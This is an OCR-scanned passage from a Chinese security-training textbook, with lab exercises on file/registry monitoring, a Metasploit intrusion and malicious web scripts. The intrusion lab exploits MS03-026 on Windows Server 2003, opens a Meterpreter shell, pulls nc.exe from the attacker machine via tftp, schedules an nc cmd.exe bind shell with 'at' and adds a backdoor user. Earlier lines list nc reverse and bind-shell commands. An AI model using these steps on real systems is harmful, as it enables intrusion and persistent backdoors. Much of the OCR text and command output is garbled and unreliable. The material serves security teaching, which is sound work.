~ SogouInput. ppup - 
m C3 Sysinternals 
HA TinRAR 


46.43914052 
46.43915T02 
46.42512591 
40,45522043 
40 .4145924552 
46,4392 Too2 
40.4594646T 
11.5035 T4 T1 
41.503311 
41.303629 38 
11.501T296T 
41.50160 


HELE VS EC UNITY) Policy ser Dezc V (Default ) 

HEU VS EC URTTY Po11c7^5 ec Dec 

HEU VS EC URTTY Po1ic 7^5 ec Dec 

HELÈ VS EC URTTY Policy ser Dezc | (Default ) 

HELA AS EC URTTI Policy AS ec Dec 

HELÈ (S EC URTTY Policy 

HEU. DEFAULT) Soti vm etd 1c Too t Wi rb cers AC urr en. .. 
HEL V SOFTTA PES P0112 1624 10 ro gott MI om curre... 
MEC U 


Hutu S 


图 4-34 定位 进程 在 注册 表 中 的 位 置 
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4.4.4 任务 与 思考 


本 实验 通过 对 3 个 工具 的 介绍 ,使 读者 掌握 了 当 系 统 中 的 文件 .文件 夹 .注册 表 等 内 容 
发 生 改 变 时 ,如 何 对 这 些 操作 进行 监视 和 记录 。 从 安全 防范 角度 来 讲 , 这 些 操作 对 防止 攻击 
者 人 侵 是 非常 有 帮助 的 。 尤 其 是 为 用 户 提 供 资 源 服务 的 服务 硕 系 统 , 有 哪些 用 户 在 什么 时 
间 对 哪些 文件 系统 和 注册 表 进 行 了 操作 ,这些 信息 管理 人 员 都 必须 实时 擎 握 ,并 能 够 根据 记 
录 信 息 动 态 分 析 资 源 的 访问 情况 ,同时 能 够 对 系统 应 用 的 安全 性 提供 准确 信息 。 

在 此 基础 上 ,读者 需要 对 木马 的 防范 方法 进行 全 面 深 入 的 学 习 。 例 如 ,在 Windows 系 
统 中 ,如 何 通过 查看 开放 端口 .注册 表 和 系统 配置 文件 等 方式 来 发 现 木 马 。 除 此 之 外 ,用 户 
还 可 以 通过 查看 系统 进程 和 使 用 专用 木马 检测 软件 ,来 判断 系统 中 是 否 存在 木马 。 

读者 可 将 这 些 与 木马 防范 相关 的 知识 与 本 实验 中 所 涉及 的 工具 应 用 功能 结合 起 来 , 进 
而 对 系统 的 安全 提供 相应 的 保护 措施 。 


4.5 xc FE A. df 


4.5.1 预备 知识 : Metaspolit 工具 使 用 方法 


Metasploit 是 一 于 开源 的 安全 漏洞 检测 工具 ,安全 人 员 稼 用 Metasploit 工具 来 检测 系 
统 的 安全 性 。Metasploit Framework(MSF) 是 2003 年 以 开放 源 代码 方式 发 布 .、 可 自由 获取 
的 开发 框架 ,为 渗透 测试 、shellcode 编写 和 漏洞 研究 提供 了 一 个 可 靠 的 平台 。MSF 集成 了 
各 平台 上 常见 的 溢出 漏洞 和 流行 的 shellcode, 并 且 不 断 进行 更 新 和 完善 。 作 为 安全 工具 ， 
MSF 提供 了 强大 的 安全 检测 功能 ,并 为 漏洞 月 动 化 探测 和 及 时 检测 系统 漏洞 提供 有 力 的 
保障 。 

(1) MSF 提供 的 主要 远程 攻击 命令 。 

at: 查看 本 地 计算 机 上 的 计划 作业 。 

atip: 查看 远程 计算 机 上 的 计划 作业 ,其 中 ,ip 为 远程 计算 机 使 用 的 IP 地 址 。 

atip 时 间 命 令 ( 注 意 加 盘 符 ); 在 远程 计算 机 上 添加 一 个 作业 。 

atip 计划 作业 id/delete: 删除 远程 计算 机 上 的 一 个 计划 作业 。 

atip all/ delete: 删除 远程 计算 机 上 的 全 部 计划 作业 。 

(2) nc 命令 常用 的 参数 。 

nc. exe 是 一 个 可 对 远程 主机 进行 各 类 操作 的 网 络 工 具 ,主要 参数 含义 如 下 。 

-h: 查看 帮助 信息 。 

-eprog: 程序 重 定 问 ,一 旦 连接 就 执行 。 

d: 监听 模式 ,用 于 入 站 连接 。 

-t: 使 用 Telnet 交互 方式 。 

(3) nc 命令 的 基本 用 法 。 

为 便于 实验 操作 ,下 面 介 绍 “nc” 命 令 的 几 个 常见 使 用 方法 。 

nc -nvv 192. 168.0.1 80: 连接 到 192. 168. 0. 1 主机 的 80 端口 。 

nc -l -p 80; 开启 本 机 的 TCP 80 端口 并 监听 。 
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nc -nvv -w2 -z 192.168. 0. 1 80-1024; 扫描 192. 168.0. 1 主机 的 80-1024 端口 。 

nc -l -p 5354 -t -e c; winntsystem32cmd. exe: 绑 定 远程 主机 的 cmdshell, 并 开局 远程 
主机 的 TCP 5354 端口 。 

nc -t -e c: windowssystem32cmd. exe 192. 168. 0. 2 5354: 绑 定 远程 主机 的 cmdshell. 
并 反问 连接 192. 168. 0.2 的 5354 Wi EH, 


4.5.2 实验 目的 和 条 件 


1. 实验 目的 

本 实验 较为 系统 地 介绍 了 实现 远程 入 侵 的 过 程 和 具体 实施 方法 ,其 中 被 攻击 主机 运行 
的 是 Windows Server 2003 及 以 上 版 本 的 服务 天 操作 系统 ,而 攻击 者 使 用 了 BackTrack5 A 
"if H] metaspolit 渗透 工具 。 通 过 本 实验 ,在 读者 继续 学 习 Metaspolit 工具 使 用 方法 的 基础 
上 ,掌握 远程 人 侵 的 实现 过 程 。 

2. 实验 条 件 

本 实验 所 需要 的 软 鲁 件 清单 如 表 4-1 所 示 。 

表 4-1 远程 入 侵 实 验 清单 


类 型 序 号 软 硬 件 要 求 A 格 
1f 


NN E 


攻击 机 操作 系统 版 本 BackTrack5CBT5) 
1f 
$m EL 操作 系统 版 本 Windows Server 


软件 版 本 2003 及 以 上 


4.5.3 实验 过 程 


步骤 1: 分 别 打 开 服 机 和 攻击 机 ,并 以 官 理 员 号 份 登录 系统 。 其 中 ,本 实验 中 靶 机 问 运 
行 的 操作 系统 是 Windows Server 2003 ,攻击 机 上 运行 的 是 BackTrack5 操作 系统 。 


步骤 2: 登录 靶 机 后 ,打开 命令 提示 符 窗口 ,通过 “ipconfig” 命 令 查 看 本 机 的 IP 地 址 ,本 
实验 为 192. 168. 12. 145 ,如 图 4-35 所 示 。 
EX 命令 提示 符 o -|o x| 


Microsoft Windows [版 本 5.2.37981 
«C» hRAVPR 1985-2003 Microsoft Corp. 


C:\Documents and Settings VMdministrator»ipconfig 


Windows IP Configuration h 


Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix . : cloudlab.com 

IP Address. . . . . . . . . . . . * 192.168.12.145 
: 255.255.255.0 
: 192.168.12.254 


C:\Documents and Settings dministrator> 


图 4-35 ”使 用 “ipconfig” 命 令 查 看 靶 机 的 IP 地 址 
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步骤 3: 进入 攻击 机 ,如 果 出 现 的 是 字符 界面 ,初学 者 可 以 使 用 “startx” 命 令 切 换 到 图 
形 界 面 。 

步骤 4: 使 用 “ifconfig” 命 令 查看 攻击 机 的 IP 了 地址 ,本 实验 为 192. 168. 12. 148 ,如 图 4-36 
所 示 。 


File Edit View Terminal Help 

root@bt:~# ifconfig 

eth Link encap:Ethernet HWaddr 6c:0c:1d:5b:e9:b4 
inet addr:192.168.12.148 $8Bcast:192.168.12.255 MasK*?255,255.255.0 
inet6 addr: fe80::6e0c:1dff:fe5b:e9b4/64 Scope;Link 
UP BROADCAST RUNNING MULTICAST MTU:1508 Metric:1 
RX packets:190 errors:0 dropped:0 overruns:0 frame:0 
TX packets:26 errors:0 dropped:0 overruns:9 carrier:6 
collisions:0 txqueuelen:1000 
RX bytes:14282 (14.2 KB) TX bytes:2487 (2.4 KB) 
Interrupt:10 Base address:0xe000 


Link encap:Local Loopback 

inet mmc Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:14 afrors: 0 droppedtO overruns:0 framd: o 
"x f3CMetsfTT drodrs:0 dropped:O Wer anao darrie 
cousions;o txqueuelen 

RX bytes :889—(889 0.8) b bytes:BB9 (889.0 B) 


root@bt : -4 


图 4-36 ”使 用 "ifconfig” 命 令 查看 攻击 机 的 IP 地 址 


5. 本 实验 通过 攻击 机 (IP 地 址 为 192. 168. 12. 148) 对 和 靶 机 (IP 地址 为 192. 168. 12. 145) 
$ 


TE 2X im A [1 P A" msfconsole" mS ,启用 MSF Console 工具 ,如 图 4-37 所 示 。 


" 


Edit View Terminal Help 


3Kom SuperHack II Logon 


User Name: 


Password: 


--=[ 928 exploits - 499 auxil 
--=[ 251 payloads - 28 encode 


ary - 151 post 
s - 8 nops 


-[-metaspioit-v445.B-dev UA api:1:8J 


图 4-37 启用 MSF Console 工具 


步骤 6: 本 实验 利用 Windows Server 2003 操作 系统 中 存在 的 “ms03 026 漏洞 ?进行 渗 
透 攻 击 。 其 中 ,关于 “ms03_026 mih” T3308 B) TH ORE AU IH e A HT A TH OR VURL ,在 此 不 再 缆 述 
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下 面 使 用 “search ms03 026? 命 令 查找 需要 使 用 的 exploit 模块 ,如 图 4-38 所 示 。 


|^ v x rootGbt: ~ 
File Edit View Terminal Help 


msf »|search ms03 026 


Matching Modules 


Disclosure Date Rank 


exploit/windows/dcerpc/ms03 826 dcom 2803-07-16 80:80:00 UTC great Microso 


ft RPC DCOM Interface Overflow 


V V V V V V VV V V 


图 4-38 ”使 用 “search ms03_026” 命 令 查 找 需要 使 用 的 exploit 模块 
步骤 7: 使 用 “show options” 命 令 可 以 查看 exploit 模块 的 参数 ,如 图 4-39 所 示 。 


^ v X lroot@bt: ~ 
File Edit View Terminal Help 


p _026_ 
exploit(ms03 026 dcom) > 


Module options (exploit/windows/dcerpc/ms03 026 .dCom): 
Name Current Setting Required Description 


The target address 
RPORT J435 The target port 


potu 


Id m 


© Windows NT A TR Universal 


sf exploit(ms03 026 dcom) » 


4-39 ”查看 exploit 模块 的 参数 


步骤 8. fli Hi" sec dp Vx BIB SI ute Hn Br JA X Sap 4-40 所 示 。 

RHOST: 远程 主机 的 IP 地 址 。 例 如 ,通过 “set RHOST 192. 168. 12. 145" p S ,设置 
需要 进行 远程 渗透 攻击 的 十 程 主机 的 IP 地 址 为 192. 168. 12. 145, 

RPORT: 远程 主机 的 端口 。 

另外 ,Required 栏 中 标注 为 yes 的 项 ,表示 必须 要 设置 的 内 容 。 
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^ v X rootabt ~ 
File Edit View Terminal Help 


© Windows NT SP3-6a/2000/XP/2003 Universal 


msf exploit(ms03 026 dcom) » set RHOST 192:168.12.145 
RHOST -» 192.168.12.145 
msf exploit(ms03 026 dcom) > show options 


Module options (exploit/windows/dcerpc/ms03 026 dcom): 


Name Current Setting Required Description 


RHOST  192.168.12.145 yes The target address 
RPORT 135 yes The target port 


Windows NT SP3-6a/2000/XP/2003 Universal 


msf exploit(ms03 026 dcom) > 


图 4-40 ”使 用 “set” 命 令 设 置 渗透 攻击 过 程 中 所 需 的 参数 


WE Ji i xfi A 


果 如 图 4-41 所 示 。 结 果 显 示 已 经 渗透 成 功 ,其 中 ,Meterpreter 是 Metaspolit 默认 的 shellcode, 


^ v X rootabt ~ 
File Edit View Terminal Help 
RPORT 135 yes The target port 


Exploit target: 
Id Name 


0 Windows NT SP3-6a/2000/XP/2003 Universal 


msf exploit(ms03 026 dcom) » exploit 


[*] Started reverse handler on 192.168.12.148:4444 

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... 

[*] Bigding to 4d9f4ab8-7d1c-11cf:861e-0020af6e7c57:0.0ncacn ip tcp2192:158.12« 
145[138] ... | | 

j>] Bold to 4d9f4a58- 701€ JT cf -861e-00203f 887€ 57:79, 0gfiC3C m i$" tcp: 192 2168732. 14 

5[135]A.. 

[*] Sending expioit w 

[*] Sending stage (752128 bytes) 192.168.12.145 

[*] Meterpreter session 1 opened (192.168.12.148:4444 -> 192.168.12.1495*42105) at 
2014-07-23 17:55:35 «0800 


meterpreter > J 


图 4-41 使 用 “exploit” 命 令 开 始 对 靶 机 进行 远程 渗透 攻击 


步骤 10: 使 用 shell” 命令 ,可 以 创建 一 个 攻击 者 需要 的 shell 权限 ,其 中 显示 了 靶 机 的 


Mie rette 言 息 ,如 图 4-42 所 示 。 
步骤 11: 渗透 成 功 后 ,为 了 下 次 方便 登录 该 靶 机 ,攻击 者 还 需 : 


. EJ] 


>- Hoc. E 


ed -个 tftp 服务 硕 , 本 实验 使 用 了 BT5 Hi HJ tftp HB Ag $8 AX 0. 位 于 |/ ‘home/ 
tftpboot 目录 下 ,如 图 4-43 所 示 。 有 关 tftp 服务 器 的 搭建 过 程 ,请 读者 参阅 相关 资料 完成 ， 


在 此 不 再 性 述 。 
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^ v X root@bt: ~ 
File Edit View Terminal Help 


meterpreter > 
meterpreter 


> 
meterpreter > 
meterpreter > 
meterpreter > 
meterpreter > 


meterpreter > 

meterpreter >[shett ] 

Process 428 created . 

Channel 1 created. 

Microsoft Windows [60;j 5.2.3790] 

(C) 66E6000 1985-2003 Microsoft Corp. 


C: WINDOWSXSystem32» 
C: AWWINDOWSXSystem32» 
Ca WINDOWSVSs y stemma?» 
Ct WwWINDOWSYXS y Skem32» 


C: AWWINDOWSXSystem32» 
C: \WINDOWS\ sys tem32> 


图 4-42 ”使 用 “shell” 命 令 创 建 一 个 shell 权限 


^ v X lroot@bt: /home/tftpboot 
File Edit View Terminal Help 
root@bt:/# cd /home/tftpboot/ 


图 4-43 进入 tftp 服务 器 主 文件 所 在 的 目录 


步骤 12: 使 用 tftp 工具 将 nc. exe TR. E f£ Sl $8 BLÉ C:\Windows\system32 目录 下 。 
具体 命令 为 “tftp -i 192. 168. 12. 148 get nc. exe”, 即 将 攻击 机 上 的 nc. exe E. HR. E £z SS BL 
CIP 地 址 为 192. 168. 12. 145) 的 C:\Windows\system32\ 目 录 下 。 本 次 操作 失败 ,显示 如 
图 4-44 所 示 的 信息 。 上 传 失 败 的 原因 是 nc. exe 的 权限 较 低 ,需要 使 用 chmod 命令 提 权 后 
再 进行 上 传 操 作 。 

步骤 13. 使 用 “chmod 777 nc. exe" dg A X] nc. exe 文件 进行 提 权 操作 ,如 图 4-45 所 示 。 

步骤 14. 再 次 使 用 “tftp -i 192. 168. 12. 148 get nc. exe" fp ^ ,将 攻击 机 上 的 nc. exe X 
件 上 传 到 靶 机 的 C:\Windows\system32\ 目 录 下 ,显示 如 图 4-46 所 示 的 信息 ,说 明 上 传 成 功 。 

步骤 15i 使 用 “netstat -ano” 命 令 查 看 靶 机 上 打开 的 端口 情况 ,如 图 4-47 所 示 。 
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File Edit View Terminal Help 


[*] Started reverse handler on 192.168.12.148:4444 

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... 

[*] Binding to 4d9f4ab8-7d1c-1llcf-861e-0020af6e7c57:0, 0ncacn--ip-&ep: 192.168.12. 
145[135] ... 

[*] Bound to 4d9f4ab8-7d1c-l1cf-861e-0020af6e7c57:0.0ncacfl ip tcp:192,168, 12.14 
5[135] 

[*] Sending exploit ... 

[*] Sending stage (752128 bytes) to 192.168.12.145 

[*] Meterpreter session 1 opened (192.168.12.148:4444 -> 192.168.12,145:11985) at 
2014-07-23 17:55:35 40800 


meterpreter » shell 
Process 1972 created. 


ChanneL 1 created. 
Microsft Windows [6/5 5.2.3790] 
(C) 6659000. 1385-2092 I GF oS6ft Carp. 


C XWINDOWSXS yStem32»tftp -i 122.16.12.148 get nccexe 
tftp -i 192.168.12.148 get nc.exe 

Error on server : Access violation 

Connect request failed 


C: AWINDOWSXSystem32» 


图 4-44 上 传 nc. exe 工具 失败 


^ v X root@bt /home/tftpboot 
File Edit View Terminal Help 


-$ cd /home/tftpboot/ 
: /home/tftpbooté ls 


:;/home/tftpboot& chmod 777 nc.exe 
: /home/tftpboots f 


4-45 对 nc. exe 文件 进行 提 权 操作 


C:\WINDOWS\System32>tftp -i 192.10B.12.148 get nc.exe 
tftp -i 192.168.12.148 get nc.exe 
Transfer successful: 61440 bytes in 1 second, 61440 bytes/s 


C: WWINDOWSAsystem32» Y 


图 4-46 JEE nc. exe 工具 


^ v X pootabt ~ 
File Edit View Terminal Help 
Transfer successful: 61440 bytes in 1 second, 61440 bytes/s 


C: WINDOWSMsystem32»netstat -ano 
netstat -ano 


Active Connections 


ddress State 
LISTENING 


Proto A 
0 
ð LISTENING 
0 
0 
0 


1 
TCP .0.8.0:135 ð. 
TCP .0.0.0:445 .0.0. 
TCP .0.0.0:1025 .0.0. LISTENING 
TCP .0.0.0:1027 ð. LISTENING 
TCP .0.0.0:5205 .0.0. LISTENING 
TCP .168. 12.145: 1071 .168. 12 TIME WAIT 
TCP . 168. 12. 145; 1972 .168. 12 TIME, WAIT 
TCP . 168. 12. 14%: 1873 168232 TIME: WAIT 
TCP . 16822 A45: 1874 . 168222 TTME: WATT 
TCP 468121145: 1878 .168:32.82: TIMÉ WAIT 
TCP . 168712 .145: 1680 .168 "t2. 42: TIME WAIT 
TCP .168.12.145:1083 .168.12.45: TIME WAIT 
TCP .168.12.145:1084 .168.12.45: TIME WAIT 
TCP .168.12.145:1085 .168.12.46: TIME WAIT 
TCP .168.12.145:1086 .168.12.46: TIME WAIT 
TCP .168.12.145:1087 .168.12.47: TIME WAIT 


图 4-47 查看 靶 机 上 打开 的 端口 情况 


n 

8: 
0: 
:上 
0: 
ð: 


~i 
cu 
4A 


oMoNoN- NoXoN Nu NE 
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步骤 16. 使 用 “net time \\192. 168. 12. 145” 命 令 查 看 靶 机 的 当前 系统 时 间 , 如 图 4-48 
所 示 。 


C: \WINDUNSNs y t6032:4€t ng \\192 1687127 189^ 
et tile ^(1927168.12.145 
14192. 168712 .145 $;01^0608 Marre 6668-01: 57 


boUb | 666656 


C: \WINDOWS\ system32> 


图 4-48 A REL E R SERI i8) 


步骤 17: 利用 at 任务 计划 命令 ,使 靶 机 上 已 经 上 传 的 nc. exe 工具 能 够 根据 攻击 者 的 
要 求 ,实现 定时 自动 运行 。 命 令 为 “at \\192. 168. 12. 145 02:02 nc. exe -l -p 5354 -t -e "c: \ 
indue stem emat exe" ", 3B pb iX B. RBLCIP 3h di 7j 192. 168. 12. 145) 在 每 天 的 
02:02 定时 运行 nc. exe 程序 。 
输入 “nc. exe -l -p 5354 -t -e "c:\windows\system32\cmd. exe" ”命令 ,可 以 实现 nc. exe 
LEAH 5354 端口 与 cmd. exe Z EHLE. 
以 上 操作 过 程 和 结果 显示 如 图 4-49 所 示 。 


C:\WINDOWS\system32>at \\192.168.12.145 82:02 nc.exe -l -p 5354 -t -GCC Window 
SVsystem32Xcmd. exe" 

at 14192.168.12.145 02:02 nc.exe -l -p 5354 -t -e "c:NindowsMsystem32Xcmd exe" 
66666666. 660606. ID = 1 


£: NWINDONWSVs y $te932 9t 
mn 


dowsNsystem32Xcmd . exe 


C: WWINDOWSNsystem32» 
图 4-49 ”利用 “at” 命 令 实现 在 靶 机 上 定时 运行 指定 的 程序 ,并 实现 端口 与 指定 程序 之 间 的 绑 定 


步骤 18. 通过 以 上 设置 ,当时 间 到 达 02;02 时 ,nc. exe 程序 开始 自动 运行 。 此 时 ,可 以 
使 用 ”telnet” 命 令 连 接 到 靶 机 ,如 图 4-50 所 示 。 


rootebt :~# telnet 192.168.12.145 5354 
Trying 192.168.12.145... 

Connected to 192.168.12.145. 

Escape character is '^]'. 

Microsoft Windows [6;; 5.2.3798] 

(C) Ô 1985-2003 Microsoft Corp. 


C: \WINDOWS\ sys tem32>$ 


图 4-50 ”使 用 “telnet” 命 令 远 程 登录 靶 机 


步骤 19: 连接 成 功 后 ,攻击 机 将 获得 对 靶 机 的 控制 权限 ,之 后 就 可 以 在 靶 机 上 进行 相关 
的 操作 。 例 如 ,使 用 “net user hh 123456 /add” 命 令 ， 在 车 机 上 创建 -个 名 称 为 hh、 密 码 为 
123456 的 新 建 用 户 账户 ,如 图 4-51 所 示 。 

步骤 20; 使 用 “netstat -ano” 命 令 查 看 已 经 打开 的 端口 ,如 图 4-52 所 示 , 显示 5354 端口 
处 于 被 打开 状态 。 
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^ v X root@bt: ~ 


File Edit View Terminal Help 


C: \WINDOWS\system32¢net user hh 123456 /add 


net user hh 123456 /add 
66660 1066006 


C : WINDOWSXSsystem32» 


\\ 6606066'6 


Administrator Guest 
SUPPORT 38894528 
GUG6U0G00006060Up60G60G6U0h 60600006006 


C: \WWINDOWS\ system32> 
C: \WINDOWS\ system32> 


C : \WINDOWS\system32> 
C : \WINDOWS\ sys tem 2> 


& 


C: WWINDOWSAsystem32» 


B] 4-51 在 靶 机 上 创建 新 用 户 账 户 


TCP 0.0.0: 0.0.60: LISTENING 
TCP 0.0.8: 0.8.08: LISTENING 
TCP 0.0.8: 0.0.0: LISTENING 
TCP x brp :1105 3 .12. 4444 ESTABLISHED 
TCP i 222 4 :1218 à .12. :445 TIME WAIT 
TCP . .12. :1214 à d. :445 TIME WAIT 
TCP e (Md. :1215 í Pr :445 TIME WAIT 
TCP à id, :1216 . »-r :445 TIME WAIT 
TCP a M. :1217 i .12. :445 TIME WAIT 
TCP i "Md. : 1219 Ado :445 TIME WAIT 
TCP : $5 :1220 i "dd. :445 TIME WAIT 
TCP . .12. :1250 . » r^ :445 TIME WAIT 
TCP Md. :1251 i *rp :445 TIME WAIT 
TCP . Wre : 1254 : "rn :445 SYN SENT 
,168.12.148:49345 ESTABLISHED 
UDP ,0.0.0: - 

UDP 

UDP 

UDP 

UDP 

UDP 


oO 45 
Oo O^ L^ 
o A c 


ooo 00voolo 


C: NWWINDOWSASystem32» 
C: \WINDOWS\system32 


B] 4-52 ”显示 靶 机 上 处 于 打开 状态 的 端口 信息 
其 他 功能 的 应 用 ,读者 可 在 Meterpreter 工具 帮助 文档 的 文 持 下 , 目 己 学 习 和 和 擎 握 。 
4.5.4 任务 与 思考 


本 实验 综合 了 多 方面 的 网 络 攻击 知识 ,主要 包括 漏洞 的 利用 、 远 程控 制 .远程 人 侵 、 提 权 
操作 、 后 门 设 置 等 ,读者 可 继续 深入 系统 地 学 习 这 些 内 容 。 同 时 ,在 本 实验 的 基础 上 ,继续 进 
行 如 下 内 容 的 实验 。 

(1) 针对 特定 服务 的 攻击 。 

(2) 针对 远程 节点 的 攻击 。 

(3) 针对 用 户 账 户 的 攻击 。 


第 4 章 恶意 代码 攻防 实 训 149 


4.6 脚本 及 恶意 网 页 攻击 


4.6.1 预备 知识 : 脚本 及 恶意 网 页 


1. 脚本 

脚本 (script) 是 使 用 一 种 特定 的 描述 性 语言 ,依据 一 定 的 格式 编写 的 可 执行 文件 ,该 文 
件 又 称 为 宏 或 批 处 理 文件 。 脚 本 是 批 处 理 文件 的 延伸 ,是 一 种 以 纯 文 本 方式 保存 的 程序 。 
通常 所 讲 的 计算 机 脚本 程序 ,是 指 由 一 系列 能 够 控制 计算 机 进行 运算 操作 的 指令 形成 的 集 
合 ,该 集合 中 的 指令 之 间 存 在 一 定 的 逻辑 关联 性 。 

简单 地 讲 ,脚本 是 用 文本 编辑 器 (如 Windows 操作 系统 中 的 “记事 本 ”) 编 写 的 一 条 条 命 
S ,脚本 程序 在 执行 时 , 巾 系 统 的 一 个 解释 需 将 其 逐条 翻译 成 机 需 可 识别 的 指令 ,并 按 程 序 
顺序 执行 。 因 为 脚本 在 执行 时 多 了 一 个 翻译 过 程 ,所 以 它 比 二 进 制程 序 的 执行 效率 低 。 

脚本 通常 可 以 由 应 用 程序 临时 调用 并 执行 。 各 类 脚本 被 广泛 地 应 用 于 网 页 设计 中 , 因 
为 脚本 不 仅 可 以 减 小 网 页 的 规模 ,提高 网 页 浏览 的 速度 ,而 且 可 以 丰富 网 页 的 显示 效果 ,如 
动画 、 声 音 等 。 例 如 , 当 单 击 网 页 上 的 邮箱 地 址 时 ,系统 会 自动 调用 在 系统 上 已 经 安装 的 
Outlook Express 或 Foxmail 等 邮件 收发 和 管理 软件 ,其 中 的 自动 调用 过 程 就 是 通过 脚本 功 
能 来 实现 的 。 也 正 是 因为 脚本 的 这 些 特点 ,往往 被 攻击 者 利用 ,如 在 脚本 中 加 入 一 些 破 坏 计 
算 机 系统 的 命令 ,这 样 当 用 户 浏 览 网 页 时 ,一旦 调用 这 类 脚本 , 便 会 使 用 户 的 系统 受到 攻击 。 

2. 网 页 病毒 

网 页 病毒 是 利用 网 页 进行 攻击 的 一 类 恶意 代码 , 它 具 有 以 下 明显 的 特征 。 

(OD 其 性 质 是 一 类 恶意 代码 。 

(2) 其 目的 是 进行 破坏 ,或 者 扰乱 用 户 的 正常 操作 。 

(3) 其 实现 方式 是 借助 Web 应 用 尤其 是 浏览 器 存在 的 安全 漏洞 ,并 通过 植 人 方式 进行 攻击 。 

网 页 病毒 能 够 以 各 种 方式 自动 执行 ,其 根源 是 它 完 全 不 受用 户 的 控制 。 当 用 户 一 旦 浏 
览 了 含有 恶意 代码 的 网 页 时 ,恶意 代码 就 会 日 动 执行 ,给 用 户 端 计算 机 市 来 不 同 程 度 的 破坏 
或 影响 。 

网 页 病毒 一 般 通 过 以 下 的 形式 诱 使 用 户 来 访问 。 

(OD 一 个 好 听 的 网 页 名 称 。 

(2) 利用 浏览 者 的 猎奇 或 贪 焚 心 理 。 

(3) 无 意识 的 浏览 者 。 


4.6.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 进一步 学 习 和 掌握 以 下 内 容 。 
(1) 脚本 的 特征 和 编写 方法 。 

(2) 网 页 病毒 的 特征 和 攻击 方式 。 

(3) 网 页 病毒 的 安全 防范 方法 。 
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2. 实验 条 件 


本 实验 可 在 Windows XP 及 以 上 版 本 操作 系统 的 计算 机 上 进行 ,该 计算 机 既 可 以 是 一 
台 物 理 机 ,也 可 以 是 一 台 虚 拟 机 。 


4.6.3 实验 过 程 


EUR 1: 以 Administrator 身份 登录 实验 中 的 计算 机 操作 系统 。 
步骤 2: 进入 实验 前 先 准备 好 脚本 文件 所 在 的 文件 夹 D:\tools, 如 图 4-53 所 示 。 相 关 
文件 的 内 容 , 在 随后 的 实验 中 将 会 介绍 。 
mma 
cle mE > data2 (D) » toos -| EI 


s7 和 包 合 到 库 中 v 共享 " 刻录 gimi es v e 


> 


创建 .bct 拷 见 ,bd IMS. txt 修改 ,bxt 


A 4-53 ”实验 用 的 文件 夹 


步骤 3: 用 “记事 本 ”等 文本 编辑 工具 打开 “创建 . txt 文件 ,将 显示 如 图 4-54 所 示 的 执 
行 脚本 的 内 容 。 


i p 
Xi) RRE 格式 0) 查看 (VY) WR500 


“TITLE> 他 | 建文 件 c:MTEST-HTMKZTITLE》> 
«SCRIPT LRNGURGE-"UBScript"» 
Q-- 
Din fso, F1 
Set fso = Createübject("Scripting.FileSystenmübject"') 
Set f1 = fso.CreateTextFile("c:MATEST.HTM", True) 
=--> 
</SCRIPT> 


</HEAD> 
<BODY> 


4-54 “创建 . txt” 文 件 的 内 容 


步骤 4: 打开 C 盘 ,查看 C 盘 下 是 否 有 test. htm 文件 。 正 常情 况 下 ,此 时 不 会 在 C 盘 下 
存在 test. htm 文件 。 

步骤 5: 修改 “创建 . txt 文件 的 类 型 为 .htm, 然 后 单 击 该 文件 使 其 运行 。 当 出 现 如 图 4-55 
所 示 的 提示 信息 时 , 单 击 “ 确 定 ” 按 钮 ,允许 阻止 的 内 容 的 运行 。 随 后 ,出 现 如 图 4-56 所 示 的 
空 日 显示 页 面 。 
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Jd 创建 文件 c: MIEST. HIE 一 了 icrosoft Internet Explorer 
XO) AmE ESV ”收藏 如 IAM) HH) 


Q=- O- iuigQG pm y O B- mL 


地 址 (D) €) D: tools VER. htm E ] E 
(y 为 帮助 梨 护 您 的 实 全 ，Internet Explorer 已 经 限制 | 比 立 件 显示 可 能 访问 您 的 计算 机 的 活动 内 容 。 单 击 此 处 查看 选项 ... 


您 注意 到 信息 栏 了 吗 ? 


生生 


口 不 再 显示 此 信息 0). 


> 本 地 磁盘 (CO) 


图 4-55 浏览 器 安全 提示 信息 


3 创建 文件 c:\TEST. HIE 一 Nicrosoft Internet Explorer 
文件 下 ) ”编辑 在) EEV BÆ IAM 帮助 人 0 


Q=: - O- iid € xs yo O 2-3 8-LUR,S 


€) D: Vtool s NÉE. htm 


图 4-56 空白 显示 页 面 
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步骤 6: 重新 查看 C 盘 , 就 会 发 现存 在 一 个 名 称 为 TEST. HTM 的 文件 ,如 图 4-57 
所 示 。 


+ Ami (C:) 
文件 G) 编辑 GE) $50) KEA 工具 CT) 帮助 00 


Bd Orr [xx [uu 


KRUS A (27 orte and LJ DRIVER LJ Program Files 


y 隐 基 此 驱动 器 的 内 容 

动 添加 /删除 程序 D | TEST. xma 

P Ls LJ m" TM. Docunent 
文件 和 文件 来 任务 9 

»R iP ara: 


4-57 自动 创建 的 名 称 为 TEXT. HTM 的 文件 


说 明 通 过 在 浏览 器 中 运行 “创建 . htm” 文 件 后 ,在 C 盘 下 上 自动 创建 了 一 个 名 称 为 
“TEST. HTM” 的 文件 。 

步骤 7: 打开 D: Vis CONES UH Mi txt” 文 件 , 此 文件 主要 对 前 面 已 经 创建 的 
"test. htm” 文 件 的 内 容 进行 修改 , “修改. txt” 文 件 的 内 容 如 图 4-58 所 示 。 


XPT ec 格式 0) EEV WO 


«SCRIPT LRNGURGE-"'UBScript''» 
«1-- 
Din fso, tf 
Set fso = CreateOübject("Scripting.FileSystemObject") 
set tf = fso. PA ALTA. C:NXTEST.HTM", True) 
A 


” 写 一 行 ， 并 带 有 一 个 换行 I 
tf. WriteLine("«html1»«bod Pie 的 方式 修改 已 存在 文 Jj«/body»«/htnl»") 
p MEA y 页 脚本 X 存在 文件 内 容 成 ody 


写 二 
tf. WriteBlankLines(3) 


tf. Write ("This is a test.") 
tf.Close 


-> FEES (C) 


4-58 “修改 . txt” 文 件 的 内 容 


步骤 8. 修改 “修改 .txt” 文 件 的 类 型 为 . htm, 然 后 单 击 该 文件 使 之 运行 , 当 出 现 类 似 如 
图 4-59 所 示 的 安全 提示 信息 时 ， 选择 “允许 阻止 的 内 容 ”选项 ,并 在 出 现 的 对 话 框 中 直接 单 
击 “ 是 ”按钮 ,允许 该 文件 在 浏览 器 中 打开 ， a 4-60 所 示 。 

